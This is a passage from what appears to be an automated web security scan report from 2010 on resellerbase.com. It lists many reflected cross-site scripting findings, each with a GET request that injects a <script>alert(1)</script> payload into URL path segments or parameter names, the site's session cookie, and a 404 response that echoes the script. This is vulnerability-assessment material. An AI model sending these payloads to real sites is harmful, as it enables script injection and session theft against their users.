<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmosf4c91<script>alert(1)</script>ff818d033ba/ was not found on this server.</p>
...[SNIP]...

2.1411. http://www.resellerbase.com/detail/17/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ad1b7<script>alert(1)</script>fdede210638 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/?ad1b7<script>alert(1)</script>fdede210638=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/?ad1b7<script>alert(1)</script>fdede210638=1 was not found on this server.</p>
...[SNIP]...

2.1412. http://www.resellerbase.com/detail/17/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ddf77<script>alert(1)</script>fd225057296 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailddf77<script>alert(1)</script>fd225057296/17/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailddf77<script>alert(1)</script>fd225057296/17/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1413. http://www.resellerbase.com/detail/17/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4eb6<script>alert(1)</script>19767392c06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17c4eb6<script>alert(1)</script>19767392c06/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17c4eb6<script>alert(1)</script>19767392c06/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1414. http://www.resellerbase.com/detail/17/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d5e17<script>alert(1)</script>081982733a8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themesd5e17<script>alert(1)</script>081982733a8/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themesd5e17<script>alert(1)</script>081982733a8/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1415. http://www.resellerbase.com/detail/17/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97feb<script>alert(1)</script>3a6681cf373 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos97feb<script>alert(1)</script>3a6681cf373/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos97feb<script>alert(1)</script>3a6681cf373/images/ was not found on this server.</p>
...[SNIP]...

2.1416. http://www.resellerbase.com/detail/17/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 77cb6<script>alert(1)</script>5215804ab40 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images77cb6<script>alert(1)</script>5215804ab40/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images77cb6<script>alert(1)</script>5215804ab40/ was not found on this server.</p>
...[SNIP]...

2.1417. http://www.resellerbase.com/detail/17/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 840c6<script>alert(1)</script>0a8dfb7287a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/?840c6<script>alert(1)</script>0a8dfb7287a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/?840c6<script>alert(1)</script>0a8dfb7287a=1 was not found on this server.</p>
...[SNIP]...

2.1418. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7d7c8<script>alert(1)</script>c0bdaa04fb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7d7c8<script>alert(1)</script>c0bdaa04fb8/17/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7d7c8<script>alert(1)</script>c0bdaa04fb8/17/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1419. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2d37<script>alert(1)</script>098d340f6fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17f2d37<script>alert(1)</script>098d340f6fb/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17f2d37<script>alert(1)</script>098d340f6fb/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1420. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e8e22<script>alert(1)</script>29b3acbb467 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themese8e22<script>alert(1)</script>29b3acbb467/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themese8e22<script>alert(1)</script>29b3acbb467/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1421. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9aaf3<script>alert(1)</script>99de6b80b41 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos9aaf3<script>alert(1)</script>99de6b80b41/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos9aaf3<script>alert(1)</script>99de6b80b41/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1422. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 88ddf<script>alert(1)</script>20568e09517 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images88ddf<script>alert(1)</script>20568e09517/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images88ddf<script>alert(1)</script>20568e09517/rating/ was not found on this server.</p>
...[SNIP]...

2.1423. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7d04c<script>alert(1)</script>a28ebdf3e87 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/rating7d04c<script>alert(1)</script>a28ebdf3e87/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating7d04c<script>alert(1)</script>a28ebdf3e87/ was not found on this server.</p>
...[SNIP]...

2.1424. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 50f8c<script>alert(1)</script>fbc5d093e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/rating/?50f8c<script>alert(1)</script>fbc5d093e7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/?50f8c<script>alert(1)</script>fbc5d093e7=1 was not found on this server.</p>
...[SNIP]...

2.1425. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50ca8<script>alert(1)</script>181d0f5a1ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail50ca8<script>alert(1)</script>181d0f5a1ef/17/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail50ca8<script>alert(1)</script>181d0f5a1ef/17/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1426. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 209fe<script>alert(1)</script>f19d0b1e497 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17209fe<script>alert(1)</script>f19d0b1e497/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17209fe<script>alert(1)</script>f19d0b1e497/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1427. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37f3f<script>alert(1)</script>ea4cdde19cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes37f3f<script>alert(1)</script>ea4cdde19cd/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes37f3f<script>alert(1)</script>ea4cdde19cd/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1428. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 664f6<script>alert(1)</script>775d7889e58 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos664f6<script>alert(1)</script>775d7889e58/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos664f6<script>alert(1)</script>775d7889e58/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1429. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3c17e<script>alert(1)</script>56dfc02bed3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images3c17e<script>alert(1)</script>56dfc02bed3/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images3c17e<script>alert(1)</script>56dfc02bed3/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1430. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ee222<script>alert(1)</script>cddb10b6b20 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

